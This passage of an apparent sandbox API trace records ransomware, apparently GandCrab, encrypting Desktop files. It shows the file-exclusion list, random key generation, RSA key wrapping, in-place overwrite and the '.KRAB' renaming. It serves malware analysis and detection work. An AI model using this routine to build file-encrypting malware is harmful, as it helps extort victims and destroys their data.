lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x94fe, lpOverlapped=0x0) returned 1 [0086.149] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff6b02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.149] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x94fe, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x94fe, lpOverlapped=0x0) returned 1 [0086.150] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.150] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.154] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.154] CloseHandle (hObject=0x434) returned 1 [0086.154] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.154] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bgaie7vatbfeudfph.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bgaie7vatbfeudfph.mkv.krab")) returned 1 [0086.159] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.159] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.159] lstrcmpW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2=".") returned 1 [0086.159] lstrcmpW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="..") returned 1 [0086.159] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="BoREMi9cj9CK7xKnWhQ.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav" [0086.159] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.160] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav.KRAB") returned 58 [0086.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav") returned 53 [0086.160] lstrlenW (lpString=".wav") returned 4 [0086.160] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.160] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0086.160] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav") returned 53 [0086.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav") returned 53 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="desktop.ini") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="autorun.inf") returned 1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="ntuser.dat") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="iconcache.db") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="bootsect.bak") returned 1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="boot.ini") returned 1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="ntuser.dat.log") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="thumbs.db") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="ntldr") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="NTDETECT.COM") returned -1 [0086.161] lstrcmpiW (lpString1="BoREMi9cj9CK7xKnWhQ.wav", lpString2="Bootfont.bin") returned 1 [0086.161] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.161] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010930) returned 1 [0086.163] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.163] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.164] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.164] CryptGenRandom (in: hProv=0x1010930, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.164] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0086.164] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.164] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010930) returned 1 [0086.166] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.166] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.166] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.166] CryptGenRandom (in: hProv=0x1010930, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.166] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0086.166] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.167] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0086.168] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0086.168] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.168] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.169] GetLastError () returned 0x0 [0086.169] CryptDestroyKey (hKey=0x10234f8) returned 1 [0086.169] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.169] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0086.170] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.170] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.170] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.171] GetLastError () returned 0x0 [0086.171] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.171] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0086.171] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\boremi9cj9ck7xknwhq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.171] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.172] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.172] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xdc98, lpOverlapped=0x0) returned 1 [0086.186] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff2368, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.186] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xdc98, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xdc98, lpOverlapped=0x0) returned 1 [0086.188] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.188] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.192] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.192] CloseHandle (hObject=0x434) returned 1 [0086.192] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.193] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\boremi9cj9ck7xknwhq.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\BoREMi9cj9CK7xKnWhQ.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\boremi9cj9ck7xknwhq.wav.krab")) returned 1 [0086.194] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.194] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.194] lstrcmpW (lpString1="CrvJ6e01NChIZ.flv", lpString2=".") returned 1 [0086.194] lstrcmpW (lpString1="CrvJ6e01NChIZ.flv", lpString2="..") returned 1 [0086.194] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="CrvJ6e01NChIZ.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv" [0086.194] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.194] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv.KRAB") returned 52 [0086.194] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv") returned 47 [0086.194] lstrlenW (lpString=".flv") returned 4 [0086.194] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.195] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0086.195] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv") returned 47 [0086.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv") returned 47 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="desktop.ini") returned -1 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="autorun.inf") returned 1 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="ntuser.dat") returned -1 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="iconcache.db") returned -1 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="bootsect.bak") returned 1 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="boot.ini") returned 1 [0086.195] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="ntuser.dat.log") returned -1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="thumbs.db") returned -1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="ntldr") returned -1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="NTDETECT.COM") returned -1 [0086.196] lstrcmpiW (lpString1="CrvJ6e01NChIZ.flv", lpString2="Bootfont.bin") returned 1 [0086.196] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.196] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0086.198] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.198] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.198] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.198] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.198] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.198] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.199] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011238) returned 1 [0086.200] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.201] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.201] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.201] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.201] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.201] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.201] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0086.204] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0086.204] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.204] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.204] GetLastError () returned 0x0 [0086.205] CryptDestroyKey (hKey=0x10231f8) returned 1 [0086.205] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.205] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0086.206] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10230f8) returned 1 [0086.206] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.206] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.207] GetLastError () returned 0x0 [0086.207] CryptDestroyKey (hKey=0x10230f8) returned 1 [0086.207] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.207] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\crvj6e01nchiz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.207] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.208] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.208] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x6bcb, lpOverlapped=0x0) returned 1 [0086.221] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff9435, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.221] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6bcb, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x6bcb, lpOverlapped=0x0) returned 1 [0086.221] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.222] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.225] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.226] CloseHandle (hObject=0x434) returned 1 [0086.226] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.226] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\crvj6e01nchiz.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CrvJ6e01NChIZ.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\crvj6e01nchiz.flv.krab")) returned 1 [0086.227] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.227] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.227] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0086.227] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0086.227] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a08d2ca4dee3d.lock" [0086.227] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.228] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 58 [0086.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned 53 [0086.228] lstrlenW (lpString=".lock") returned 5 [0086.228] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.228] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0086.228] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.229] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.229] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.229] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0086.229] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0086.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini" [0086.229] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.229] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini.KRAB") returned 46 [0086.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0086.229] lstrlenW (lpString=".ini") returned 4 [0086.229] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.230] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0086.230] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0086.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\desktop.ini") returned 41 [0086.230] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0086.230] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.230] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.231] lstrcmpW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2=".") returned 1 [0086.231] lstrcmpW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="..") returned 1 [0086.231] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="HKcfvorlM2_dKP8TXm.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx" [0086.231] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.231] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx.KRAB") returned 58 [0086.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx") returned 53 [0086.231] lstrlenW (lpString=".xlsx") returned 5 [0086.231] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.231] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0086.231] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx") returned 53 [0086.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HKcfvorlM2_dKP8TXm.xlsx") returned 53 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="desktop.ini") returned 1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="autorun.inf") returned 1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="ntuser.dat") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="iconcache.db") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="bootsect.bak") returned 1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="boot.ini") returned 1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="ntuser.dat.log") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="thumbs.db") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="ntldr") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="NTDETECT.COM") returned -1 [0086.232] lstrcmpiW (lpString1="HKcfvorlM2_dKP8TXm.xlsx", lpString2="Bootfont.bin") returned 1 [0086.232] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.233] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | 